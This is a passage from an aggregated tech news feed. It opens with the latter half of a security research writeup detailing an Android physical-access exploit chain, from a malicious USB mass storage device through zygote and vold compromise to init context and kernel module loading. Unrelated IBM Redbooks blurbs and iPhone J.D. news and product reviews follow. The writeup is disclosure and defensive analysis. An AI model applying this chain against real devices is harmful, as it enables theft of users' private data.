  • Restrictions on access to vfat filesystems: When a vfat filesystem is mounted, all of its files are labeled as u:object_r:vfat:s0. Even if the filesystem is mounted in a place from which important code or data is loaded, many SELinux contexts won't be permitted to actually interact with the filesystem - for example, the zygote and system_server aren't allowed to do so. On top of that, processes that don't have sufficient privileges to bypass DAC checks also need to be in the media_rw group. The section "Dealing with SELinux: Triggering the bug twice" describes how these restrictions can be avoided in the context of this specific bug.
Exploitation: Chameleonic USB mass storageAs described in the previous section, a FAT filesystem label is limited to 11 bytes. blkid supports a range of other filesystem types that have significantly longer label strings, but if you used such a filesystem type, you'd then have to make it past the fsck check for vfat filesystems and the filesystem header checks performed by the kernel when mounting a vfat filesystem. The vfat kernel filesystem doesn't require a fixed magic value right at the start of the partition, so this might theoretically work somehow; however, because several of the values in a FAT filesystem header are actually important for the kernel, and at the same time, blkid also performs some sanity checks on superblocks, the PoC takes a different route.
After blkid has read parts of the filesystem and used them to determine the filesystem's type, label and UUID, fsck_msdos and the in-kernel filesystem implementation will re-read the same data, and those repeated reads actually go through to the storage device. The Linux kernel caches block device pages when userspace directly interacts with block devices, but __blkdev_put() removes all cached data associated with a block device when the last open file referencing the device is closed.
A physical attacker can abuse this by attaching a fake storage device that returns different data for multiple reads from the same location. This allows us to present, for example, a romfs header with a long label string to blkid while presenting a perfectly normal vfat filesystem to fsck_msdos and the in-kernel filesystem implementation.
This is relatively simple to implement in practice thanks to Linux' built-in support for device-side USB. Andrzej Pietrasiewicz's talk "Make your own USB gadget" is a useful introduction to this topic. Basically, the kernel ships with implementations for device-side USB mass storage, HID devices, ethernet adapters, and more; using a relatively simple pseudo-filesystem-based configuration interface, you can configure a composite gadget that provides one or multiple of these functions, potentially with multiple instances, to the connected device. The hardware you need is a system that runs Linux and supports device-side USB; for testing this attack, a Raspberry Pi Zero W was used.
The f_mass_storage gadget function is designed to use a normal file as backing storage; to be able to interactively respond to requests from the Android phone, a FUSE filesystem is used as backing storage instead, using the direct_io option / the FOPEN_DIRECT_IO flag to ensure that our own kernel doesn't add unwanted caching.
At this point, it is already possible to implement an attack that can steal, for example, photos stored on external storage. Luckily for an attacker, immediately after a USB stick has been mounted, com.android.externalstorage/.MountReceiver is launched, which is a process whose SELinux domain permits access to USB devices. So after a malicious FAT partition has been mounted over /data (using the label string 'UUID="../../data'), the zygote forks off a child with appropriate SELinux context and group membership to permit accesses to USB devices. This child then loads bytecode from /data/dalvik-cache/, permitting us to take control over com.android.externalstorage, which has the necessary privileges to exfiltrate external storage contents.
However, for an attacker who wants to access not just photos, but things like chat logs or authentication credentials stored on the device, this level of access should normally not be sufficient on its own.Dealing with SELinux: Triggering the bug twiceThe major limiting factor at this point is that, even though it is possible to mount over /data, a lot of the highly-privileged code running on the device is not permitted to access the mounted filesystem. However, one highly-privileged service does have access to it: vold.
vold actually supports two types of USB sticks, PublicVolume and PrivateVolume. Up to this point, this blogpost focused on PublicVolume; from here on, PrivateVolume becomes important.A PrivateVolume is a USB stick that must be formatted using a GUID Partition Table. It must contain a partition that has type UUID kGptAndroidExpand (193D1EA4-B3CA-11E4-B075-10604B889DCF), which contains a dm-crypt-encrypted ext4 (or f2fs) filesystem. The corresponding key is stored at /data/misc/vold/expand_{partGuid}.key, where {partGuid} is the partition GUID from the GPT table as a normalized lowercase hexstring.
As an attacker, it normally shouldn't be possible to mount an ext4 filesystem this way because phones aren't usually set up with any such keys; and even if there is such a key, you'd still have to know what the correct partition GUID is and what the key is. However, we can mount a vfat filesystem over /data/misc and put our own key there, for our own GUID. Then, while the first malicious USB mass storage device is still connected, we can connect a second one that is mounted as PrivateVolume using the keys vold will read from the first USB mass storage device. (Technically, the ordering in the last sentence isn't entirely correct - actually, the exploit provides both mass storage devices as a single composite device at the same time, but stalls the first read from the second mass storage device to create the desired ordering.)
Because PrivateVolume instances use ext4, we can control DAC ownership and permissions on the filesystem; and thanks to the way a PrivateVolume is integrated into the system, we can even control SELinux labels on that filesystem.
In summary, at this point, we can mount a controlled filesystem over /data, with arbitrary file permissions and arbitrary SELinux contexts. Because we control file permissions and SELinux contexts, we can allow any process to access files on our filesystem - including mapping them with PROT_EXEC.Injecting into zygoteThe zygote process is relatively powerful, even though it is not listed as part of the TCB. By design, it runs with UID 0, can arbitrarily change its UID, and can perform dynamic SELinux transitions into the SELinux contexts of system_server and normal apps. In other words, the zygote has access to almost all user data on the device.
When the 64-bit zygote starts up on system boot, it loads code from /data/dalvik-cache/arm64/system@framework@boot*.{art,oat,vdex}. Normally, the oat file (which contains an ELF library that will be loaded with dlopen()) and the vdex file are symlinks to files on the immutable /system partition; only the art file is actually stored on /data. But we can instead make system@framework@boot.art and system@framework@boot.vdex symlinks to /system (to get around some consistency checks without knowing exactly which Android build is running on the device) while placing our own malicious ELF library at system@framework@boot.oat (with the SELinux context that the legitimate oat file would have). Then, by placing a function with __attribute__((constructor)) in our ELF library, we can get code execution in the zygote as soon as it calls dlopen() on startup.
The missing step at this point is that when the attack is performed, the zygote is already running; and this attack only works while the zygote is starting up.Crashing the systemThis part is a bit unpleasant.
When a critical system component (in particular, the zygote or system_server) crashes (which you can simulate on an eng build using kill), Android attempts to automatically recover from the crash by restarting most userspace processes (including the zygote). When this happens, the screen first shows the boot animation for a bit, followed by the lock screen with the "Unlock for all features and data" prompt that normally only shows up after boot. However, the key material for accessing user data is still present at this point, as you can verify if ADB is on by running "ls /sdcard" on the device.
This means that if we can somehow crash system_server, we can then inject code into the zygote during the following userspace restart and will be able to access user data on the device.
Of course, mounting our own filesystem over /data is very crude and makes all sorts of things fail, but surprisingly, the system doesn't immediately fall over - while parts of the UI become unusable, most places have some error handling that prevents the system from failing so clearly that a restart happens.After some experimentation, it turned out that Android's code for tracking bandwidth usage has a safety check: If the network usage tracking code can't write to disk and >=2MiB (mPersistThresholdBytes) of network traffic have been observed since the last successful write, a fatal exception is thrown. This means that if we can create some sort of network connection to the device and then send it >=2MiB worth of ping flood, then trigger a stats writeback by either waiting for a periodic writeback or changing the state of a network interface, the device will reboot.
To create a network connection, there are two options:
  • Connect to a wifi network. Before Android 9, even when the device is locked, it is normally possible to connect to a new wifi network by dragging down from the top of the screen, tapping the drop-down below the wifi symbol, then tapping on the name of an open wifi network. (This doesn't work for networks protected with WPA, but of course an attacker can make their own wifi network an open one.) Many devices will also just autoconnect to networks with certain names.
  • Connect to an ethernet network. Android supports USB ethernet adapters and will automatically connect to ethernet networks.

For testing the exploit, a manually-created connection to a wifi network was used; for a more reliable and user-friendly exploit, you'd probably want to use an ethernet connection.
At this point, we can run arbitrary native code in zygote context and access user data; but we can't yet read out the raw disk encryption key, directly access the underlying block device, or take a RAM dump (although at this point, half the data that would've been in a RAM dump is probably gone anyway thanks to the system crash). If we want to be able to do those things, we'll have to escalate our privileges a bit more.From zygote to voldEven though the zygote is not supposed to be part of the TCB, it has access to the CAP_SYS_ADMIN capability in the initial user namespace, and the SELinux policy permits the use of this capability. The zygote uses this capability for the mount() syscall and for installing a seccomp filter without setting the NO_NEW_PRIVS flag. There are multiple ways to abuse CAP_SYS_ADMIN; in particular, on the Pixel 2, the following ways seem viable:
  • You can install a seccomp filter without NO_NEW_PRIVS, then perform an execve() with a privilege transition (SELinux exec transition, setuid/setgid execution, or execution with permitted file capability set). The seccomp filter can then force specific syscalls to fail with error number 0 - which e.g. in the case of open() means that the process will believe that the syscall succeeded and allocated file descriptor 0. This attack works here, but is a bit messy.
  • You can instruct the kernel to use a file you control as high-priority swap device, then create memory pressure. Once the kernel writes stack or heap pages from a sufficiently privileged process into the swap file, you can edit the swapped-out memory, then let the process load it back. Downsides of this technique are that it is very unpredictable, it involves memory pressure (which could potentially cause the system to kill processes you want to keep, and probably destroys many forensic artifacts in RAM), and requires some way to figure out which swapped-out pages belong to which process and are used for what. This requires the kernel to support swap.
  • You can use pivot_root() to replace the root directory of either the current mount namespace or a newly created mount namespace, bypassing the SELinux checks that would have been performed for mount(). Doing it for a new mount namespace is useful if you only want to affect a child process that elevates its privileges afterwards. This doesn't work if the root filesystem is a rootfs filesystem. This is the technique used here.

In recent Android versions, the mechanism used to create dumps of crashing processes has changed: Instead of asking a privileged daemon to create a dump, processes execute one of the helpers /system/bin/crash_dump64 and /system/bin/crash_dump32, which have the SELinux label u:object_r:crash_dump_exec:s0. Currently, when a file with such a label is executed by any SELinux domain, an automatic domain transition to the crash_dump domain is triggered (which automatically implies setting the AT_SECURE flag in the auxiliary vector, instructing the linker of the new process to be careful with environment variables like LD_PRELOAD):
https://android.googlesource.com/platform/system/sepolicy/+/master/private/domain.te#1:domain_auto_trans(domain, crash_dump_exec, crash_dump);
At the time this bug was reported, the crash_dump domain had the following SELinux policy:
https://android.googlesource.com/platform/system/sepolicy/+/a3b3bdbb2fdbb4c540ef4e6c3ba77f5723ccf46d/public/crash_dump.te:[...]allow crash_dump {  domain  -init  -crash_dump  -keystore  -logd}:process { ptrace signal sigchld sigstop sigkill };[...]r_dir_file(crash_dump, domain)[...]
This policy permitted crash_dump to attach to processes in almost any domain via ptrace() (providing the ability to take over the process if the DAC controls permit it) and allowed it to read properties of any process in procfs. The exclusion list for ptrace access lists a few TCB processes; but notably, vold was not on the list. Therefore, if we can execute crash_dump64 and somehow inject code into it, we can then take over vold.
Note that the ability to actually ptrace() a process is still gated by the normal Linux DAC checks, and crash_dump can't use CAP_SYS_PTRACE or CAP_SETUID. If a normal app managed to inject code into crash_dump64, it still wouldn't be able to leverage that to attack system components because of the UID mismatch.
If you've been reading carefully, you might now wonder whether we could just place our own binary with context u:object_r:crash_dump_exec:s0 on our fake /data filesystem, and then execute that to gain code execution in the crash_dump domain. This doesn't work because vold - very sensibly - hardcodes the MS_NOSUID flag when mounting USB storage devices, which not only degrades the execution of classic setuid/setgid binaries, but also degrades the execution of files with file capabilities and executions that would normally involve automatic SELinux domain transitions (unless the SELinux policy explicitly opts out of this behavior by granting PROCESS2__NOSUID_TRANSITION).
To inject code into crash_dump64, we can create a new mount namespace with unshare() (using our CAP_SYS_ADMIN capability), then call pivot_root() to point the root directory of our process into a directory we fully control, and then execute crash_dump64. Then the kernel parses the ELF headers of crash_dump64, reads the path to the linker (/system/bin/linker64), loads the linker into memory from that path (relative to the process root, so we can supply our own linker here), and executes it.
At this point, we can execute arbitrary code in crash_dump context and escalate into vold from there, compromising the TCB. At this point, Android's security policy considers us to have kernel-equivalent privileges; however, to see what you'd have to do from here to gain code execution in the kernel, this blogpost goes a bit further.From vold to init contextIt doesn't look like there is an easy way to get from vold into the real init process; however, there is a way into the init SELinux context. Looking through the SELinux policy for allowed transitions into init context, we find the following policy:
https://android.googlesource.com/platform/system/sepolicy/+/master/private/kernel.te:domain_auto_trans(kernel, init_exec, init)
This means that if we can get code running in kernel context to execute a file we control labeled init_exec, on a filesystem that wasn't mounted with MS_NOSUID, then our file will be executed in init context.
The only code that is running in kernel context is the kernel, so we have to get the kernel to execute the file for us. Linux has a mechanism called "usermode helpers" that can do this: Under some circumstances, the kernel will delegate actions (such as creating coredumps, loading key material into the kernel, performing DNS lookups, ...) to userspace code. In particular, when a nonexistent key is looked up (e.g. via request_key()), /sbin/request-key (hardcoded, can only be changed to a different static path at kernel build time with CONFIG_STATIC_USERMODEHELPER_PATH) will be invoked.
Being in vold, we can simply mount our own ext4 filesystem over /sbin without MS_NOSUID, then call request_key(), and the kernel invokes our request-key in init context.
The exploit stops at this point; however, the following section describes how you could build on it to gain code execution in the kernel.From init context to the kernelFrom init context, it is possible to transition into modprobe or vendor_modprobe context by executing an appropriately labeled file after explicitly requesting a domain transition (note that this is domain_trans(), which permits a transition on exec, not domain_auto_trans(), which automatically performs a transition on exec):
domain_trans(init, { rootfs toolbox_exec }, modprobe)domain_trans(init, vendor_toolbox_exec, vendor_modprobe)
modprobe and vendor_modprobe have the ability to load kernel modules from appropriately labeled files:
allow modprobe self:capability sys_module;allow modprobe { system_file }:system module_load;allow vendor_modprobe self:capability sys_module;allow vendor_modprobe { vendor_file }:system module_load;
Android nowadays doesn't require signatures for kernel modules:
walleye:/ # zcat /proc/config.gz | grep MODULECONFIG_MODULES_USE_ELF_RELA=yCONFIG_MODULES=y# CONFIG_MODULE_FORCE_LOAD is not setCONFIG_MODULE_UNLOAD=yCONFIG_MODULE_FORCE_UNLOAD=yCONFIG_MODULE_SRCVERSION_ALL=y# CONFIG_MODULE_SIG is not set# CONFIG_MODULE_COMPRESS is not setCONFIG_MODULES_TREE_LOOKUP=yCONFIG_ARM64_MODULE_CMODEL_LARGE=yCONFIG_ARM64_MODULE_PLTS=yCONFIG_RANDOMIZE_MODULE_REGION_FULL=yCONFIG_DEBUG_SET_MODULE_RONX=y
Therefore, you could execute an appropriately labeled file to execute code in modprobe context, then load an appropriately labeled malicious kernel module from there.Lessons learnedNotably, this attack crosses two weakly-enforced security boundaries: The boundary from blkid_untrusted to vold (when vold uses the UUID provided by blkid_untrusted in a pathname without checking that it resembles a valid UUID) and the boundary from the zygote to the TCB (by abusing the zygote's CAP_SYS_ADMIN capability). Software vendors have, very rightly, been stressing for quite some time that it is important for security researchers to be aware of what is, and what isn't, a security boundary - but it is also important for vendors to decide where they want to have security boundaries and then rigorously enforce those boundaries. Unenforced security boundaries can be of limited use - for example, as a development aid while stronger isolation is in development -, but they can also have negative effects by obfuscating how important a component is for the security of the overall system.
In this case, the weakly-enforced security boundary between vold and blkid_untrusted actually contributed to the vulnerability, rather than mitigating it. If the blkid code had run in the vold process, it would not have been necessary to serialize its output, and the injection of a fake UUID would not have worked.
Categories: Security

IBM Power System E980: Technical Overview and Introduction

IBM Redbooks Site - Fri, 09/07/2018 - 09:30
Redpaper, published: Fri, 7 Sep 2018

This IBM® Redpaper™ publication provides a broad understanding of a new architecture of the IBM Power System E980 (9080-M95) server that supports IBM AIX®, IBM i, and Linux operating systems (OSes).

Categories: Technology

In the news

iPhone J.D. - Thu, 09/06/2018 - 23:47

Earlier this year, Apple announced a new iPad with support for the new Logitech Crayon, a stylus this is almost as good as the Apple Pencil for half the price.  Although the Crayon was only available for the education market, I said at the time that I hoped it would give rise to many new stylus options with the precision of the Apple Pencil.  The jury is still out on whether additional styluses are coming, but in a baby step towards that future, attorney John Voorhees of MacStories reports that Apple announced this week that the Logitech Crayon will be available for everyone to purchase, even if you are not in the education sector, starting September 12.  Of course, that is also the day next week when Apple has scheduled a big event at its campus to show off the new iPhones and who knows what else. The Crayon announcement makes me think that we may see a new iPad next week, and if Apple wants to show off even more new stylus options next week, I would certainly love that.  And now, the news of note from the past week:

  • The Lit Software blog features Arizona attorney Brian Snyder and explains how he uses his iPad in his law practice.
  • What will the new iPhones being unveiled next week be called?  John Gruber of Daring Fireball has some theories.
  • Earlier this year, I discussed a service called TeenSafe which restricts the ability of your kids to use your iPhone, but does so at great risk because you have to give the service access to your iCloud backup, which is a problem if the site is hacked — and sure enough, TeenSafe was hacked.  Ben Lovejoy of 9to5Mac reports that a similar product called mSpy accidentally exposed millions of passwords, text messages, contacts, call logs, notes and location data, etc. to the Internet.  I remain very suspicious of services like this.  Be careful out there.
  • Cella Lao Rousseau of iMore discusses some of the best watch stands for the Apple Watch.
  • Recently, a 15-year-old student tried to share with her mother a photo of a mock crime scene from a medical biology class.  She tried to do so using AirDrop, when she was on a plane, and instead she shared the photo with 15 other random passengers, as the plane was taken off.  The chaos that ensued resulted in grounding the Hawaiian Airlines flight for 90 minutes.  Michael Potuck of 9to5Mac has more details (including the picture).  Hopefully something like this will never happen to you.
  • I cannot tell you what features the new iPhones will have next week, but one thing that they surely won't have is support for the upcoming 5G standard.  I see iPhone 5G support in 2019 or 2020.  But that's not that far away, so it isn't too early to think about what 5G means.  I discussed the transition to 5G earlier this year.  This week, David Pogue of Yahoo wrote a good overview of what 5G means, and also created a nice video overview.
  • The Sweet Setup recommends photo editing apps for iOS.
  • Phishing attacks are increasingly common, and are especially dangerous for law firms because of the confidential information stored on law firm networks.  Many law firms have had to deal with major hacking attacks over the last few years.  Yesterday, the Apple Support account on Twitter posted a good, short video explaining how to look out for phishing attacks on your Apple devices:

Got a suspicious email or text? Don't click on any links or open any attachments. It could be a phishing scam.

Watch our video below to see more ways to avoid phishing. pic.twitter.com/YjIHCXbqxH

— Apple Support (@AppleSupport) September 6, 2018

Categories: iPhone Web Sites

Review: Dark Sky -- fantastic weather app, now with improved interface

iPhone J.D. - Wed, 09/05/2018 - 01:23

Schools in New Orleans were closed yesterday, and many are still closed today, because for a while it looked like Tropical Storm Gordon was headed this way.  That storm instead headed towards the Mississippi/Alabama border, but it had me using my weather apps even more than normal.  Dark Sky has long been one of the best iOS weather apps because of its incredibly accurate to-the-minute forecasts for the next hour — so much so that many other apps rely on Dark Sky for their own data.  But the app was recently updated to version 6.0 with a new interface, plus it is even faster under the hood.  Especially with these improvements, there is no doubt that Dark Sky is one of the very best weather apps for the iPhone and iPad.

Accurate, minute-by-minute predictions for the next hour

One of the best features of the Dark Sky app is that it tells you whether you need to grab your umbrella as you walk out the door.  Dark Sky can figure out whether it is going to rain during the next hour at your precise location.  When you start the app, if there is rain in the next hour, you will see a graph similar to this one:

If the app tells you it will start raining in 8 minutes, you might as well start opening up your umbrella in 7 minutes.

This information is also useful if it is currently raining and you are trying to decide whether to wait for a gap in the rain, or if you should just go now because it isn't getting better any time soon. 

Great forecasts, with an improved unified interface

Many apps do a nice job of giving you forecasts for the new few hours and the next few days.  Dark Sky has always had accurate data, but thanks to the recent version 6 update, I really like the way that this data is displayed all in one place.

When you start the app, the app gives you a forecast for your specific current location, but you can quickly search for another location (and you can save up to six locations, allowing you to swipe left and right to switch between locations).  Clear icons and numbers tell you the current conditions.

Next, you see a map with rain indicated.  Dark Sky has always used an interesting style for showing radar information on a map; instead of the blocky tiny squares, the colors are smoothed out. 

Next you see the hourly forecast, provided in a fantastic interface thanks to the recent update.  A bar along the left side gives you a visual indication of rain (the color changes to blue).  Next you see the hour, the forecast information, and the temperature in a circle which moves left or right to show relative increases and decreases in temperature.  I love the way that Dark Sky now shows all of this information at once, making it incredibly easy to see when rain will start and stop over the next few hours and how the temperature will increase or decrease over the next 24 hours.

  
If you scroll down, you will see the forecast for the next week.  Again, the graphics are clean and the information is easy to understand.

If you tap on any day, you get hourly forecasts for that specific day in the same format that the app normally gives you for the next 24 hours.

Maps with radar

If you tap the Map button at the bottom of the app (or if you tap on the radar map at the top of the main screen of the app), you are brought into a map view.  You can zoom in or out to see precipitation, and you can tap a play button at the bottom to see an animation of the last three hours and the predicted next hour.  Again, the nice smooth animations which are unique to Dark Sky make it easy to see what is going on.

 

Time Machine

I usually use a weather app when I want to look to the future.  But if you need historical weather information for a particular location, Dark Sky can give you that too.

 

Apple Watch

If you use an Apple Watch, Dark Sky has a nice app which shows you much of the same information for your current location that you see in the iPhone app, except for the maps.

 

Conclusion

Dark Sky has long been the leader in accurate forecasts on the iPhone and other devices, and thanks to the recent interface update, it is now one of the best apps for presenting this information in a clean interface which quickly tells you what you need to know.  If you ever use an iPhone to pay attention to the weather, this is an app that you should own.

Click here to get Dark Sky ($3.99): 

Categories: iPhone Web Sites

In the news

iPhone J.D. - Fri, 08/31/2018 - 02:09

Yesterday, Apple announced that it will hold an product announcement event on its campus in Cupertino, California on Wednesday, September 12 at 10 Pacific.  Jason Snell of Six Colors posted a picture of the invitation.  If you don't mind spoiling the surprise of learning all of the details on September 12, Guilherme Rambo and Zac Hall of 9to5Mac seem to have obtained some marketing images from Apple showing off the new iPhone and the new Apple Watch.  John Gruber of Daring Fireball speculates that those images may have been posted to a public Apple server by mistake, leading to the leak.  If that's true, there are some very unhappy people in Cupertino today.  And now, the news of note from the past week:

  • Two factor authentication is a fantastic security method which I think will become even more prevalent in the future.  At my law firm, we use Microsoft Authenticator as a second authentication method for many of our firm's resources, such as remote access.  It works really well; using either an iPhone app — or easier still, a notification on my Apple Watch — I can confirm that yes, it really is me logging in.  This week, Alex Simons, Vice President of Program Management, Microsoft Identity Division, announced that Microsoft is rolling out Microsoft Authenticator as an Apple Watch app.  This means that even if you receive a push notification which requires a PIN or biometric, you can approve access with an Apple Watch.
  • Attorney John Voorhees of MacStories reviews the new version 3.0 0f Due, a task manager app.
  • Lisa Vaas of Naked Security reports that a U.S. citizen who is Muslim is suing US Customs and Border Protection for seizing her iPhone in an airport, copying all of the data on it, and keeping the iPhone for 130 days.  (via Ride the Lightning).
  • Zac Hall of 9to5Mac discusses using the HomeKit-compatible Lutron Serena Motorized Shades.
  • Michael Rockwell of The Sweet Setup explains how to use your iPhone and HomeKit devices to turn on the lights in your home whenever you or your spouse come home at night.
  • Jonny Evans of Computerworld has some productivity tips for the iPhone.
  • Kaitlyn Wells of Wirecutter recommends the best bag organizers to store all of your USB-to-Lightning cords, power adapters, and everything else you might want to carry around in a bag.
  • And finally, tomorrow, September 1, Apple is celebrating national parks around the world by giving you the opportunity to earn an award in the Activity app.  The graphic that you can earn was inspired by Redwood National Park's 50th anniversary.  If you do a walk, run, or wheelchair workout of 50 minutes or more, you get to add the below award to your digital collection.  I like these awards because they serve as motivators, even though we all know it is just a simple image.  If you own an Apple Watch, try to find an hour to walk tomorrow!

Categories: iPhone Web Sites

IBM Power Systems LC921 and LC922 Technical Overview and Introduction

IBM Redbooks Site - Wed, 08/29/2018 - 09:30
Draft Redpaper, last updated: Wed, 29 Aug 2018

This IBM® Redpaper™ publication is a comprehensive guide that covers the IBM Power Systems™ LC921 and LC922 (9006-12P and 9006-22P)) server tshat use the latest IBM POWER9™ processor technology and supports Linux operating systems (OS).

Categories: Technology

IBM Storage Networking SAN128B-6 Switch

IBM Redbooks Site - Wed, 08/29/2018 - 09:30
Web Doc, published: Wed, 29 Aug 2018

The IBM Storage Networking SAN128B-6 high-density switch scales easily to support storage growth, demanding workloads, and data center consolidation.

Categories: Technology

IBM Power System E950: Technical Overview and Introduction

IBM Redbooks Site - Tue, 08/28/2018 - 09:30
Redpaper, published: Tue, 28 Aug 2018

This IBM® Redpaper™ Redbooks publication gives a broad understanding of a new architecture of the IBM Power System E950 (9040-MR9) server that supports IBM AIX®, and Linux operating systems.

Categories: Technology

Review: Weego Jump Starter 22 -- jump start your car battery and recharge your iPhone battery

iPhone J.D. - Sun, 08/26/2018 - 22:28

Many of us keep handy an external battery that can be used to recharge an iPhone.  However, occasionally you need to charge another mobile device:  a car.  If you ever find yourself with a dead car battery, sometimes it is possible to find a friend with another car and jumping cables, but that is a huge aggravation and may not even be possible depending upon where your car is located.  The simple solution is to keep a portable jump starter in your trunk.  The Weego Jump Starter 22 is an amazing device that makes it incredibly simple to jump start your car, and as an added bonus you can use it to charge an iPhone or iPad.  This device recently saved my bacon, and I enthusiastically recommend that you get this device now so that you have it when you need it.

My story

Virtually all of us have had to deal with a dead car battery at some point.  Here is my recent story.  I own a relatively new car — a 2017 Honda Accord.  (Last year I wrote about how much I love the CarPlay in my new car.)  About two weeks ago, I drove my car to a store, but then when I left the store a few minutes later, my car battery was dead.  Fortunately, my wife was not too far away so she could drive to me so we could jump my car, but I knew that I wouldn't always be so lucky.  It seemed strange that this would happen to a relatively new car.  Did I maybe leave on a light overnight without realizing it?  For a while I had been thinking of buying a portable jump starter, and after this occurrence I decided to play it safe and buy the Weego Jump Starter 22 on Amazon that same day. 

A week later I had to fly to Florida for business for a few days.  When I returned to the New Orleans airport and went to start my car, once again it was dead.  This time, getting a friend to drive to me to jump my car would have been a huge nightmare.  They would have had to drive all the way to the airport, go into a pay parking lot, and even then I'm not sure how it would have worked because there were cars in all of the spots around me so I wouldn't have been able to get another car close enough to the battery in my car.  And to make matters worse, I could see that it was about to start raining in 15 minutes.

But I didn't have to worry about any of this.  I took the Weego Jump Starter 22 out of my trunk, hooked it up, started my car, and then I was on my way.  The whole experience took me less than two minutes and could not have been easier.  What normally would have been a disaster was instead incredibly quick and easy.

A few days later, I brought my car to the dealer, which confirmed that my battery had to be replaced, fortunately at no charge to me because it was under warranty.  Hopefully that is the end of this story, but if for some reason there is some other electrical issue in my car and I encounter a dead battery again, I'm not worried because I have the the Weego Jump Starter 22 with me.

How it works

Before I explain how it works, let me emphasize again how simple this thing is to use.  I am about as far as one can be from a car mechanic, and even for me, using this device was a breeze.

For example, the clamps on this thing are better than any other clamps I have ever seen.  Traditional clamps can be hard to fully open, and they open like a crocodile's mouth and can be difficult to attach to a terminal and sometimes slip off.  Weego has a patented innovation the company calls Smarty Clamps.  They open ultra-wide so it is simple to attach them to a terminal, and you don't have to squeeze very hard to get them to open fully.  Last year, Wirecutter rated the Weego Jump Starter 22s the best portable jump starter, in part because the "strong, easy-to-use clamps make a good connection on a variety of battery posts."  (The Weego Jump Starter 22 that I purchased has the same clamps; it is slightly more expensive than the 22s because it adds the ability to charge a cellphone, adds a 250 lumen flashlight, and it is rated IP65 so it is water, dust and dirt resistant.)

The Weego Jump Starter 22 comes in a metal box which looks like a lunch box and holds all of the parts.  It is nice to have something sturdy to hold it all together, and I just put the lunch box in my trunk.  It also comes with a holding bag if you want something even more compact to hold it all together.

The Jump Starter 22 delivers 1700 peak amps and 300 true cranking amps, which Weego says is sufficient for motorcycles, boats and 95% of cars & trucks on the road today — anything with up to a 5L gas or a 2.5L diesel engine.  (Weego also sells a Jump Starter 44 and a Jump Starter 66 which will work with muscle cars and big trucks — the types of cars which might laugh at my Honda Accord.)

The top of the Jump Starter 22 has a protective cover, to keep out water or dust.  To jump start a car, flip open that lid to expose a connector where you pug in the clamps.

Next, turn the Jump Starter 22 on, using the power button located on the bottom right side.

Next, you attach the black clamp to your negative terminal and the red clamp to your positive terminal.  If for some reason you get that mixed up and attach to the wrong terminals, the device will not send power and instead it beeps and lights next to the word "reverse" will flash.  So it is idiot-proof.

Next wait a second or two until you see a green ready light.  That means everything is good to go.  Start your car. 

Finally, you disconnect the clamps from the Jump Starter 22.  Once you do so, a charge is no longer flowing to the clamps, so you can disconnect the clamps from the terminals in whatever order you want.

All of the lights make it super easy to understand what is going on.  Also, four lights on the body of the device tell you how much power you have left.  I had all four lights before I jumped my car, and afterwards I still had all four lights.  It takes about 2.5 hours to fully charge the Weego Jump Starter 22, and Weego says that the device will hold a charge for at least a year, and it has 1,000 charge cycles. 

Unlike traditional jumping cables, you don't need to worry about the two clamps on the Jump Starter 22 touching each other.  The Weego only sends power when it detects that it is connected to a battery.  That, along with the reverse polarity detection, means that you don't need to worry about doing something wrong and creating sparks.

It was easy for me to find a place to put the device when I was charging my car, but if for some reason you don't have a good space, the device comes with a hook and lanyard that you could use to attach the device to the underside of your car hood.  You can also use the hook and lanyard in connection with the built-in flashlight to create a work light that lasts up to 14 hours.

The Jump Starter 22 comes with a USB-to-Micro USB charging cord.  It also comes with a USB car charger that goes into a car's power port / cigarette lighter, so you can charge this device while you are driving and when your battery is strong, and then it will be ready when necessary.

Charge your phone

Carrying a Weego Jump Starter in your car means that you never have to worry about a dead battery again.  But hopefully you won't need to use the device very often to start a car, and since the core of the device is a powerful battery, Weego also lets you use this device to charge your phone.  So if you drive somewhere only to realize that your phone is dead or low on power, just take the Weego Jump Starter 22 from your trunk, add a USB-to-Lightning cable, and you are ready to go.  (Consider storing a USB-to-Lightning cable, such as an inexpensive Anker PowerLinke cable, in the Weego lunch box so you have it if you need it.)

If the Weego is at full charge, you have 1700 Amps, which depending upon your iPhone model should give you somewhere from almost a full charge to multiple charges.  Weego advertises "up to 3 full charges" but obviously that depends upon which device you are using.  Weego also says that the Jump Starter 22 detects what kind of device you are using and "automatically provides [the] fastest charge to your phones, tablets & other USB devices," 5V or 9V at 2.4A output.

The Jump Starter 22 (without the clamps) has dimensions of 3.25" x 6.25" x .75" and weighs about 10 ounces.  You can certainly buy smaller external batteries to charge your iPhone, but the Jump Starter 22 is not intended to be the portable charger that you carry around and use every day.  It works great for the rare situation when you are away from the home or office and you need something to charge your iPhone or iPad right away — and then you are glad that the device is in your trunk so you can grab it and walk wherever you are going with something handy to charge your phone.

Conclusion

Having a portable jump starter in your car gives you peace of mind.  Everyone has a car battery die at some point, and with this device in your trunk, you'll never have to worry about being stranded or dealing with inconveniences when it happens to you.  And because of the excellent design of the Weego Jump Starter 22, it is fast and easy to jump start a car.  As an added bonus, you have a battery in your car that you can always use to charge an iPhone or iPad — which gives you even more peace of mind.

If you decide that you don't need an iPhone charger, and if you don't care about the flashlight and the IP65 rating, then get the Weego Jump Starter 22s.  It is cheaper, but the basic design is the same as the Jump Starter 22, including those fantastic clamps and useful status lights that walk you through using the device to jump a car battery.

Whichever model you get, this is a good product to get now, while you are thinking about it, so you have it later when you really need it.  You might need it for yourself, but even if you are helping a friend jump a car, it is going to be much, much easier to use a portable device like this versus getting your own car in the right position so that you can jump your friend's car using your own car.

Click here to get the Weego Jump Starter 22 from Amazon ($94.71)

Click here to get the Weego Jump Starter 22s from Amazon ($62.99)

Categories: iPhone Web Sites

In the news

iPhone J.D. - Fri, 08/24/2018 - 00:26

Rene Ritchie of iMore explains why he believes that Apple's September product announcement will take place on Wednesday, September 12, just over two weeks from now, and says that we could see a larger version of the iPhone X, perhaps with Apple Pencil support, an iPhone 9 with a design similar to the iPhone X but with an LCD screen, an Apple Watch Series 4 with smaller bezels so that the physical size is the same but the screen is larger, an iPad Pro 3, new Macs, and more.  That's a whole lot of new Apple products that could be just around the corner.  Clear some space on your credit card.  And now, the news of note from the past week:

  • Attorney John Voorhees of MacStories discusses an update to the Dark Sky app which I think greatly improves the interface of that weather app.  For a long time now, CARROT Weather has been my favorite weather app, but with this update, I've started to use Dark Sky even more.
  • Elizabeth Sullivan of PCMag reviews the Logitech Crayon — the $50 version of the Apple Pencil — and names it an Editors' Choice.  The Crayon is currently only being sold to schools, but I hope that will change in the future.  In fact, it would be fantastic to have lots of different stylus choices that all work as well as the Apple Pencil.
